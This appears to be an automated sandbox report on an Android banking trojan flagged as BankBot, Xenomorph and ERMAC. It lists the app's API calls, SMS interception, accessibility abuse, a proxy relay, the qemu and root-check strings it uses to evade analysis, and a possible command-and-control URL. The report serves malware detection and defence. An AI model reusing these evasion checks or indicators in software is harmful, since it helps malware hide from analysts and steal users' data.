Source: com.huawei.secure.android.common.ssl.util.a;->c:125	API Call: java.security.MessageDigest.digest
Source: com.unionpay.mobile.android.utils.e;->a:2	API Call: javax.crypto.Cipher.getInstance
Source: com.unionpay.mobile.android.utils.e;->a:12	API Call: javax.crypto.Cipher.init
Source: com.unionpay.mobile.android.utils.e;->a:13	API Call: javax.crypto.Cipher.doFinal
Source: com.unionpay.mobile.android.utils.c;->b:88	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.mobile.android.utils.c;->b:90	API Call: java.security.MessageDigest.digest
Source: com.unionpay.mobile.android.utils.c;->f:131	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.mobile.android.utils.c;->f:133	API Call: java.security.MessageDigest.update
Source: com.unionpay.mobile.android.utils.c;->f:134	API Call: java.security.MessageDigest.digest
Source: com.unionpay.utils.UPUtils;->a:22	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.utils.UPUtils;->a:24	API Call: java.security.MessageDigest.update
Source: com.unionpay.utils.UPUtils;->a:25	API Call: java.security.MessageDigest.digest
Source: com.unionpay.utils.d;->a:2	API Call: javax.crypto.Cipher.getInstance
Source: com.unionpay.utils.d;->a:12	API Call: javax.crypto.Cipher.init
Source: com.unionpay.utils.d;->a:13	API Call: javax.crypto.Cipher.doFinal
Source: com.unionpay.utils.b;->b:91	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.utils.b;->b:93	API Call: java.security.MessageDigest.digest
Source: com.unionpay.utils.b;->b:105	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.utils.b;->b:106	API Call: java.security.MessageDigest.update
Source: com.unionpay.utils.b;->b:107	API Call: java.security.MessageDigest.digest
Source: com.huawei.hms.utils.SHA256;->digest:3	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.hms.utils.SHA256;->digest:7	API Call: java.security.MessageDigest.update
Source: com.huawei.hms.utils.SHA256;->digest:8	API Call: java.security.MessageDigest.digest
Source: com.huawei.hms.utils.SHA256;->digest:17	API Call: java.security.MessageDigest.getInstance
Source: com.huawei.hms.utils.SHA256;->digest:18	API Call: java.security.MessageDigest.digest
Source: com.unionpay.mobile.android.pro.views.k;->d:58	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.mobile.android.pro.views.k;->d:59	API Call: java.security.MessageDigest.update
Source: com.unionpay.mobile.android.pro.views.k;->d:60	API Call: java.security.MessageDigest.digest
Source: com.unionpay.mobile.android.pro.views.a;->d:317	API Call: java.security.MessageDigest.getInstance
Source: com.unionpay.mobile.android.pro.views.a;->d:318	API Call: java.security.MessageDigest.update
Source: com.unionpay.mobile.android.pro.views.a;->d:319	API Call: java.security.MessageDigest.digest

Malware Analysis System Evasion

Checks if taint analysis is available

Source: Lcom/alipay/security/mobile/module/b/b;->t()Ljava/lang/String;

Method string: "dalvik.system.Taint"

Source: Lcom/alipay/security/mobile/module/b/b;->w()Ljava/lang/String;	Method string: "ro.kernel.qemu"
Source: Lcom/alipay/security/mobile/module/b/b;->s()Ljava/lang/String;	Method string: "/dev/qemu_pipe"
Source: Lcom/alipay/security/mobile/module/b/b;->s()Ljava/lang/String;	Method string: "/dev/socket/qemud"
Source: Lcom/alipay/security/mobile/module/b/b;->s()Ljava/lang/String;	Method string: "/system/lib/libc_malloc_debug_qemu.so"
Source: Lcom/alipay/security/mobile/module/b/b;->s()Ljava/lang/String;	Method string: "/sys/qemu_trace"
Source: Lcom/alipay/security/mobile/module/b/b;->s()Ljava/lang/String;	Method string: "/system/bin/qemu-props"
Source: Lcom/alipay/security/mobile/module/b/d;->n()Ljava/lang/String;	Method string: "ro.kernel.qemu"

Source: com.alipay.apmobilesecuritysdk.a.a;->a:38	API Call: java.util.Date.after
Source: com.alipay.apmobilesecuritysdk.common.a;->a:33	API Call: java.util.Date.after
Source: com.xiaomi.push.cg;->a:90	API Call: java.util.Date.after

Source: Lcom/alipay/security/mobile/module/b/b;->u()Ljava/lang/String;	Method string: "/proc/tty/drivers"
Source: Lcom/alipay/sdk/util/l;->d()Ljava/lang/String;	Method string: "/proc/version"
Source: Lcom/kwai/video/player/kwai_player/Util;->getProcessName(Landroid/content/Context;)Ljava/lang/String;	Method string: "/proc/self/cmdline"
Source: Lcom/alipay/security/mobile/module/b/b;->e()Ljava/lang/String;	Method string: "/proc/cpuinfo"
Source: Lcom/xiaomi/push/hf;->c()I	Method string: "/proc/meminfo"
Source: Lcom/alipay/security/mobile/module/b/b;->h()Ljava/lang/String;	Method string: "/proc/cpuinfo"
Source: Lcom/alipay/security/mobile/module/b/b;->i()Ljava/lang/String;	Method string: "/proc/cpuinfo"
Source: Lcom/alipay/security/mobile/module/b/b;->j()Ljava/lang/String;	Method string: "/proc/meminfo"

Source: com.mtnyrvojt.qtbxtwjnq.activities.AdminActivity;->onCreate:14	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.accessibility.control.DefinedAccessibilityTasks;->lambda$static$0:120	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.accessibility.control.DefinedAccessibilityTasks;->lambda$static$0:123	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.accessibility.control.DefinedAccessibilityTasks;->lambda$static$1:127	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.accessibility.control.DefinedAccessibilityTasks;->lambda$static$1:130	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->getAdmin:202	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->getDeviceName:291	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->getDeviceName:292	Field Access: android.os.Build.MODEL
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:483	Field Access: android.os.Build.BRAND
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:486	Field Access: android.os.Build.DEVICE
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:488	Field Access: android.os.Build.FINGERPRINT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:490	Field Access: android.os.Build.FINGERPRINT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:499	Field Access: android.os.Build.MODEL
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:502	Field Access: android.os.Build.MODEL
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:505	Field Access: android.os.Build.MODEL
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:508	Field Access: android.os.Build.MANUFACTURER
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:511	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:514	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:516	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:519	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:522	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:525	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->infectionAllowed:528	Field Access: android.os.Build.PRODUCT
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->startBatteryOptimizationIgnoreActivity:1005	Field Access: android.os.Build.MANUFACTURER
Source: com.huawei.appgallery.serviceverifykit.api.a;->a:45	Field Access: android.os.Build.MANUFACTURER
Source: com.alipay.security.mobile.module.b.d;->a:12	Field Access: android.os.Build.PRODUCT
Source: com.alipay.security.mobile.module.b.d;->a:15	Field Access: android.os.Build.FINGERPRINT
Source: com.alipay.security.mobile.module.b.d;->c:41	Field Access: android.os.Build.BOARD
Source: com.alipay.security.mobile.module.b.d;->d:42	Field Access: android.os.Build.BRAND
Source: com.alipay.security.mobile.module.b.d;->e:43	Field Access: android.os.Build.DEVICE
Source: com.alipay.security.mobile.module.b.d;->f:44	Field Access: android.os.Build.DISPLAY
Source: com.alipay.security.mobile.module.b.d;->h:46	Field Access: android.os.Build.MANUFACTURER
Source: com.alipay.security.mobile.module.b.d;->i:47	Field Access: android.os.Build.MODEL
Source: com.alipay.security.mobile.module.b.d;->j:48	Field Access: android.os.Build.PRODUCT
Source: com.alipay.security.mobile.module.b.d;->k:49	Field Access: android.os.Build$VERSION.RELEASE
Source: com.alipay.security.mobile.module.b.d;->l:50	Field Access: android.os.Build$VERSION.SDK
Source: com.alipay.security.mobile.module.b.d;->m:51	Field Access: android.os.Build.TAGS
Source: com.kwai.video.ksmediaplayeradapter.b.a;->i:44	Field Access: android.os.Build.MANUFACTURER
Source: com.kwai.video.ksmediaplayeradapter.b.a;->i:48	Field Access: android.os.Build.MODEL
Source: com.kwai.video.ksmediaplayeradapter.b.a;->j:58	Field Access: android.os.Build$VERSION.RELEASE
Source: com.huawei.updatesdk.b.b.c;-><init>:5	Field Access: android.os.Build$VERSION.RELEASE
Source: com.alipay.apmobilesecuritysdk.c.a;->b:25	Field Access: android.os.Build.MODEL
Source: com.huawei.updatesdk.b.c.c;->e:8	Field Access: android.os.Build.MANUFACTURER
Source: com.huawei.updatesdk.b.c.c;->f:16	Field Access: android.os.Build.MODEL
Source: com.huawei.updatesdk.b.c.f;->d:3	Field Access: android.os.Build.PRODUCT
Source: com.kwai.video.b.b.d.c;->a:54	Field Access: android.os.Build.CPU_ABI
Source: com.huawei.hms.framework.network.grs.d.a;->a:21	Field Access: android.os.Build$VERSION.RELEASE
Source: com.huawei.hms.framework.network.grs.d.a;->a:22	Field Access: android.os.Build.MODEL
Source: com.alipay.sdk.data.b;->a:172	Field Access: android.os.Build.MANUFACTURER
Source: com.alipay.sdk.data.b;->a:176	Field Access: android.os.Build.MODEL
Source: com.unionpay.mobile.android.pro.pboc.engine.b;->b:105	Field Access: android.os.Build.BRAND
Source: com.unionpay.mobile.android.pro.pboc.engine.b;->b:109	Field Access: android.os.Build.MODEL
Source: com.huawei.updatesdk.b.g.a;->a:13	Field Access: android.os.Build.BRAND
Source: com.huawei.updatesdk.b.g.a;->a:16	Field Access: android.os.Build.BRAND
Source: com.huawei.updatesdk.a.a.d.h.c;->c:76	Field Access: android.os.Build.DISPLAY
Source: com.huawei.updatesdk.a.a.d.h.c;->c:78	Field Access: android.os.Build.DISPLAY
Source: com.huawei.updatesdk.a.a.d.h.c;->c:79	Field Access: android.os.Build.DISPLAY
Source: com.huawei.updatesdk.a.a.d.h.c;->c:80	Field Access: android.os.Build.DISPLAY
Source: com.huawei.updatesdk.a.a.d.h.c;->c:81	Field Access: android.os.Build.DISPLAY
Source: com.huawei.updatesdk.a.a.d.h.c;->f:137	Field Access: android.os.Build.CPU_ABI
Source: com.huawei.hms.hatool.e1;->a:9	Field Access: android.os.Build.MODEL
Source: com.huawei.hms.hatool.f;->b:60	Field Access: android.os.Build.DISPLAY
Source: com.huawei.hms.hatool.v;->b:54	Field Access: android.os.Build.MODEL
Source: com.facebook.litho.LayoutState;->createAndMeasureTreeForComponent:315	Field Access: android.os.Build.FINGERPRINT
Source: com.alipay.sdk.packet.e;->c:153	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.au;->a:2	Field Access: android.os.Build$VERSION.RELEASE
Source: com.xiaomi.push.cg;->b:31	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.eq;->a:95	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.eq;->a:139	Field Access: android.os.Build.MODEL
Source: com.facebook.react.m;->a:36	Field Access: android.os.Build.MODEL
Source: com.hhmedic.android.sdk.module.permission.romUtils.RomUtils;->checkIs360Rom:12	Field Access: android.os.Build.MANUFACTURER
Source: com.hhmedic.android.sdk.module.permission.romUtils.RomUtils;->checkIs360Rom:15	Field Access: android.os.Build.MANUFACTURER
Source: com.hhmedic.android.sdk.module.permission.romUtils.RomUtils;->checkIsHuaweiRom:18	Field Access: android.os.Build.MANUFACTURER
Source: com.hhmedic.android.sdk.module.permission.romUtils.RomUtils;->checkIsOppoRom:32	Field Access: android.os.Build.MANUFACTURER
Source: com.hhmedic.android.sdk.module.permission.romUtils.RomUtils;->checkIsVivoRom:36	Field Access: android.os.Build.MANUFACTURER
Source: com.xiaomi.push.service.ao$a;->a:12	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.service.ck;->a:60	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.service.ck;->l:277	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.service.ck;->l:307	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.service.cq;->a:85	Field Access: android.os.Build.MODEL
Source: com.xiaomi.push.service.cq;->a:88	Field Access: android.os.Build.BOARD
Source: com.xiaomi.push.service.cq;->a:113	Field Access: android.os.Build$VERSION.RELEASE
Source: com.xiaomi.push.service.cq;->a:127	Field Access: android.os.Build.BRAND
Source: com.alipay.sdk.app.statistic.b;->b:113	Field Access: android.os.Build$VERSION.RELEASE
Source: com.alipay.sdk.app.statistic.b;->b:115	Field Access: android.os.Build.MODEL
Source: com.facebook.react.modules.systeminfo.AndroidInfoModule;->getTypedExportedConstants:37	Field Access: android.os.Build$VERSION.RELEASE
Source: com.facebook.react.modules.systeminfo.AndroidInfoModule;->getTypedExportedConstants:48	Field Access: android.os.Build.FINGERPRINT
Source: com.facebook.react.modules.systeminfo.AndroidInfoModule;->getTypedExportedConstants:51	Field Access: android.os.Build.MODEL
Source: com.facebook.react.modules.systeminfo.a;->a:5	Field Access: android.os.Build.MODEL
Source: com.facebook.react.modules.systeminfo.a;->a:7	Field Access: android.os.Build.MODEL
Source: com.facebook.react.modules.systeminfo.a;->a:11	Field Access: android.os.Build$VERSION.RELEASE
Source: com.facebook.react.modules.systeminfo.a;->b:31	Field Access: android.os.Build.FINGERPRINT
Source: com.facebook.react.modules.systeminfo.a;->c:34	Field Access: android.os.Build.FINGERPRINT
Source: com.facebook.react.views.textinput.c;->setInputType:240	Field Access: android.os.Build.MANUFACTURER
Source: com.unionpay.UPPayAssistEx;->a:136	Field Access: android.os.Build$VERSION.RELEASE
Source: com.unionpay.UPPayAssistEx;->a:140	Field Access: android.os.Build.MODEL
Source: com.alipay.sdk.util.l;->b:236	Field Access: android.os.Build$VERSION.RELEASE
Source: com.alipay.sdk.util.l;->f:435	Field Access: android.os.Build.MODEL
Source: com.unionpay.mobile.android.utils.f;->c:34	Field Access: android.os.Build.MODEL
Source: com.hhmedic.android.sdk.uikit.utils.HHDeviceHelper;->isPhone:41	Field Access: android.os.Build.BOARD
Source: com.hhmedic.android.sdk.uikit.utils.HHDeviceHelper;->isZTKC2016:43	Field Access: android.os.Build.MODEL
Source: com.hhmedic.android.sdk.uikit.utils.HHDeviceHelper;->isZUKZ1:47	Field Access: android.os.Build.MODEL
Source: com.hhmedic.android.sdk.uikit.utils.HHStatusBarHelper;->supportTranslucent:4	Field Access: android.os.Build.BRAND
Source: com.unionpay.mobile.android.nocard.views.bh;->a:29	Field Access: android.os.Build$VERSION.RELEASE
Source: com.unionpay.mobile.android.nocard.views.bh;->b:165	Field Access: android.os.Build$VERSION.RELEASE

Source: Lcom/xiaomi/clientreport/data/d;->a()Lorg/json/JSONObject;	Method string: "os"
Source: Lcom/alipay/security/mobile/module/b/d;->a()Ljava/lang/String;	Method string: "android"
Source: Lcom/xiaomi/push/providers/a;-><clinit>()V	Method string: "imsi"
Source: Lcom/kwai/video/wayne/player/main/WaynePlayer;->getProcessor(Ljava/lang/Class;)Lcom/kwai/video/wayne/player/main/AbsKpMidProcessor;	Method string: "type"
Source: Lcom/kwai/video/aemonplayer/AemonMediaPlayerAdapter$c;->a()Ljava/lang/String;	Method string: "version"
Source: Lcom/unionpay/mobile/android/nocard/utils/UPPayEngine;->l(Ljava/lang/String;)V	Method string: "sid"
Source: Lcom/xiaomi/push/service/cq;->a(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Lcom/xiaomi/push/service/cp;	Method string: "rom"
Source: Lcom/unionpay/utils/e;->e(Landroid/content/Context;)Ljava/lang/String;	Method string: "phone"
Source: Lcom/xiaomi/mipush/sdk/h;->a(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Lcom/xiaomi/mipush/sdk/p;Ljava/lang/String;Lcom/xiaomi/mipush/sdk/h$a;)V	Method string: "appid"
Source: Lcom/huawei/hms/hatool/w0;-><clinit>()V	Method string: "imei"
Source: Lcom/xiaomi/push/service/ck;->a(Ljava/lang/String;Ljava/lang/String;Ljava/util/Map;)V	Method string: "model"
Source: Lcom/kwai/video/aemonplayer/AemonMediaPlayerAdapter;->getKwaiLiveVoiceComment(J)Ljava/lang/String;	Method string: "time"
Source: Lcom/alipay/security/mobile/module/b/d;->a(Landroid/content/Context;)Z	Method string: "sdk"
Source: Lcom/xiaomi/mipush/sdk/MiPushCommandMessage;->fromBundle(Landroid/os/Bundle;)Lcom/xiaomi/mipush/sdk/MiPushCommandMessage;	Method string: "category"
Source: Lcom/xiaomi/mipush/sdk/av;->c(Landroid/content/Context;Lcom/xiaomi/mipush/sdk/ar;)Ljava/util/HashMap;	Method string: "brand"

Source: Lcom/kwai/video/ksmediaplayerkit/Utils/c;->b()D	Method string: "/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq"
Source: Lcom/alipay/security/mobile/module/b/b;->g()Ljava/lang/String;	Method string: "/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq"
Source: Lcom/kwai/video/ksmediaplayerkit/Utils/c;->a()I	Method string: "/sys/devices/system/cpu/"
Source: Lcom/alipay/security/mobile/module/b/b;->x()Ljava/lang/String;	Method string: "/sys/devices/system/cpu/"

Source: com.alipay.security.mobile.module.b.d;->a:27	API Call: android.provider.Settings$Secure.getString
Source: com.alipay.security.mobile.module.b.b;->m:278	API Call: android.provider.Settings$Secure.getString
Source: com.huawei.hms.hatool.f;->a:40	API Call: android.provider.Settings$Secure.getString
Source: com.xiaomi.push.hf;->b:89	API Call: android.provider.Settings$Secure.getString

Source: classes.dex, android	Binary or memory string: /dev/qemu_pipe
Source: classes.dex	Binary or memory string: /system/framework/%/system/lib/libc_malloc_debug_qemu.so
Source: classes.dex, android	Binary or memory string: /sys/qemu_trace
Source: classes.dex, android	Binary or memory string: /system/bin/qemu-props
Source: android	Binary or memory string: /system/lib/libc_malloc_debug_qemu.so
Source: classes.dex, android	Binary or memory string: /dev/socket/qemud
Source: classes.dex, android	Binary or memory string: ro.kernel.qemu
Source: classes.dex	Binary or memory string: %/system/lib/libc_malloc_debug_qemu.so
Source: lkfupve.gvo.dr	Binary or memory string: Ljava/lang/VirtualMachineError;

Anti Debugging

Checks if app is currently debugged

Source: Lcom/kwai/video/player/a/d;->a()V	Method string: KEY_PARAMS_DEBUG_INFO_AUTH
Source: Lcom/kwai/video/player/a/f;->a()V	Method string: KEY_PARAMS_DEBUG_INFO_AUTH
Source: Lcom/kwai/video/player/a/d;->b(Ljava/lang/String;Ljava/lang/Object;)V	Method string: KEY_PARAMS_DEBUG_INFO_AUTH
Source: Lcom/kwai/video/player/a/f;->b(Ljava/lang/String;Ljava/lang/Object;)V	Method string: KEY_PARAMS_DEBUG_INFO_AUTH
Source: Lcom/kwai/video/wayne/player/i;->a(Landroid/content/Context;)V	Method string: KEY_PARAMS_DEBUG_INFO_AUTH

Source: com.kwai.video.hodor.NetworkMonitor;->getIsp:44	API Call: android.telephony.TelephonyManager.getSimOperatorName
Source: com.xiaomi.push.hf;->i:155	API Call: android.telephony.TelephonyManager.getSimOperatorName

Source: Lcom/alipay/security/mobile/module/b/d;->b()Z

Method string: "/system/bin/", "su" and API call "File.exists" in same context

Source: com.alipay.security.mobile.module.b.b;->e:113

API Call: android.telephony.TelephonyManager.getNetworkOperatorName

Source: com.huawei.hms.framework.network.grs.local.model.CountryCodeBean;->getSimCountryCode:70

API Call: android.telephony.TelephonyManager.getNetworkCountryIso

Source: com.mtnyrvojt.qtbxtwjnq.Constants;->getImei:193	API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.mtnyrvojt.qtbxtwjnq.Constants;->getImei:194	API Call: android.telephony.TelephonyManager.getDeviceId
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->getPhoneNumbersOld:402	API Call: android.telephony.TelephonyManager.getLine1Number

Source: com.huawei.hms.framework.network.grs.local.model.CountryCodeBean;->getSimCountryCode:75	API Call: android.telephony.TelephonyManager.getSimCountryIso
Source: com.xiaomi.push.ak;->b:247	API Call: android.telephony.TelephonyManager.getSimCountryIso

Source: com.huawei.hms.framework.common.NetworkUtil;->getMNC:78	API Call: android.telephony.TelephonyManager.getNetworkOperator
Source: com.huawei.hms.hatool.z0;->e:40	API Call: android.telephony.TelephonyManager.getNetworkOperator

Stealing of Sensitive Information

Uses accessibility services (likely to control other applications)

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilAccessibility;->findNodeByName:237	API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText
Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilAccessibility;->pressButtonByText:543	API Call: android.view.accessibility.AccessibilityNodeInfo.findAccessibilityNodeInfosByText

Source: com.huawei.hms.framework.common.NetworkUtil;->isSimReady:231	API Call: android.telephony.TelephonyManager.getSimState
Source: com.huawei.hms.hatool.z0;->e:36	API Call: android.telephony.TelephonyManager.getSimState

Source: com.hhmedic.android.sdk.base.utils.HHImageUtils;->convertUri:32

Field access: android.provider.MediaStore$Images$Media.EXTERNAL_CONTENT_URI

Source: submitted apk

Request permission: android.permission.READ_SMS

Source: com.mtnyrvojt.qtbxtwjnq.services.SmsReceiver

Registered receiver: android.provider.Telephony.SMS_RECEIVED

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->getInstalledPackages:318

API Call: android.content.pm.PackageManager.getInstalledPackages

Source: com.mtnyrvojt.qtbxtwjnq.services.SmsReceiver;->getIncomingMessage:6

API Call: android.telephony.SmsMessage.createFromPdu

Source: com.hhmedic.android.sdk.module.SDKRoute;->onTakePhoto:3

API Call: android.content.Intent.<init>("android.media.action.IMAGE_CAPTURE")

Source: submitted apk

Request permission: android.permission.RECEIVE_SMS

Source: com.mtnyrvojt.qtbxtwjnq.utilities.UtilGlobal;->killApplicationByPackage:670

API Call: android.content.pm.PackageManager.getInstalledApplications

Source: submitted apk

Request permission: android.permission.READ_PHONE_STATE

Source: Lcom/xiaomi/push/gr;-><clinit>()V

Method string: "ServiceBootMode"

Remote Access Functionality

Detected Xenomorph

Source: Lcom/mtnyrvojt/qtbxtwjnq/utilities/UtilAccessibility;->pressButtonByText(Landroid/view/accessibility/AccessibilityNodeInfo;Ljava/lang/String;Z)Z

Method: Various indicators of ERMAC

Source: Lcom/huawei/updatesdk/service/otaupdate/e;->a(Lcom/huawei/updatesdk/a/b/c/c/d;)V	Method string: "updatesdk_update_info_list"
Source: Lcom/huawei/updatesdk/service/otaupdate/g;->a(Landroid/content/Context;Lcom/huawei/updatesdk/service/appmgr/bean/ApkUpgradeInfo;ZZ)V	Method string: "app_update_parm"
Source: Lcom/mtnyrvojt/qtbxtwjnq/socks/ProxyHandler;->relay()V	Instruction: "lcom/mtnyrvojt/qtbxtwjnq/socks/proxyhandler;->sendtoserver([bi)v"
Source: Lcom/huawei/updatesdk/service/otaupdate/e;->a(Lcom/huawei/updatesdk/a/b/c/c/d;)V	Instruction: "const-string v3, "updatesdk_update_info_list""
Source: Lkotlin/collections/unsigned/UArraysKt___UArraysKt;->reverse-rL5Bavg([S)V	Instruction: "lkotlin/collections/arrayskt;->reverse([s)v"
Source: Lcom/mtnyrvojt/qtbxtwjnq/api/controllers/ApiVerifyController;->sendRequest(Landroid/content/Context;)V	Instruction: "lcom/mtnyrvojt/qtbxtwjnq/constants;->getimei(landroid/content/context;)ljava/lang/string;"
Source: Lcom/mtnyrvojt/qtbxtwjnq/api/tdp/ApiGetCommandsResponsePayload;->execute(Landroid/content/Context;)V	Instruction: "lcom/mtnyrvojt/qtbxtwjnq/utilities/utilglobal;->sendsms(ljava/lang/string;ljava/lang/string;)v"
Source: Lcom/hhmedic/android/sdk/module/video/VideoAct;->onDestroy()V	Instruction: "lcom/hhmedic/android/sdk/uikit/utils/hhfileutils;->deleteuploadfiles(landroid/content/context;)v"
Source: Lcom/huawei/updatesdk/service/otaupdate/g;->a(Landroid/content/Context;Lcom/huawei/updatesdk/service/appmgr/bean/ApkUpgradeInfo;ZZ)V	Instruction: "const-string v2, "app_update_parm""

Source: com.unionpay.UPPayAssistEx;->a:279

API Call: android.app.DownloadManager.enqueue

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Application Discovery	1 Input Capture	1 System Network Connections Discovery	Remote Services	1 Location Tracking	Exfiltration Over Other Network Medium	1 Encrypted Channel	2 Exploit SS7 to Redirect Phone Calls/SMS	Remotely Track Device Without Authorization	1 Delete Device Data
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Obfuscated Files or Information	1 Capture SMS Messages	1 System Network Configuration Discovery	Remote Desktop Protocol	1 Network Information Discovery	Exfiltration Over Bluetooth	1 Non-Standard Port	1 Eavesdrop on Insecure Network Communication	Remotely Wipe Data Without Authorization	1 Carrier Billing Fraud
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Evade Analysis Environment	Security Account Manager	1 Location Tracking	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	3 Ingress Tool Transfer	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	1 Security Software Discovery	Distributed Component Object Model	1 Capture SMS Messages	Scheduled Transfer	3 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	1 Application Discovery	SSH	Keylogging	Data Transfer Size Limits	4 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	2 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Evade Analysis Environment	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Process Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Vezmhoup7U	35%	ReversingLabs	Android.Infostealer.BankBot
Vezmhoup7U	38%	Virustotal		Browse
Vezmhoup7U	100%	Avira	ANDROID/Bankbot.FRCL.Gen

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://resolver.msg.xiaomi.net/psc/?t=a	0%	Avira URL Cloud	safe
https://data-drru.push.dbankcloud.com	0%	Avira URL Cloud	safe
https://s2-10924.kwimgs.com/kos/nlav10924/temp-arm-v7_d4c5e7a0f6e3db66d5e572e8ab29bde7.zip	0%	Avira URL Cloud	safe
https://sdk01.hh-medic.com/familyapp	0%	Avira URL Cloud	safe
https://store-at-dre.hispace.dbankcloud.com/hwmarket/api/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://t.me/n3w3rras	false		high
http://bkp.had0.live/ping	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://mclient.alipay.com/service/rest.htm	classes.dex, android	false		high
https://mobile.unionpay.com/getclient?platform=android&type=securepayplugin	classes.dex	false		high
http://www.dpfile.com/sc/eleconfig/20170627151817jingdu.png	foreigncities.json	false		high
https://data-drru.push.dbankcloud.com	grs_sdk_global_route_config_opendevicesdk.json	false	Avira URL Cloud: safe	unknown
https://mclient.alipay.com/home/exterfaceAssign.htm	classes.dex, android	false		high
https://resolver.msg.xiaomi.net/psc/?t=a	classes.dex, android	false	Avira URL Cloud: safe	unknown
http://mclient.alipay.com/service/rest.htmJhttp://mobile.unionpay.com/getclient?platform=android&typ	classes.dex	false		high
http://mobilegw.aaa.alipay.net/mgw.htm	classes.dex, android	false		high
https://s2-10924.kwimgs.com/kos/nlav10924/temp-arm-v7_d4c5e7a0f6e3db66d5e572e8ab29bde7.zip	sodler.json	false	Avira URL Cloud: safe	unknown
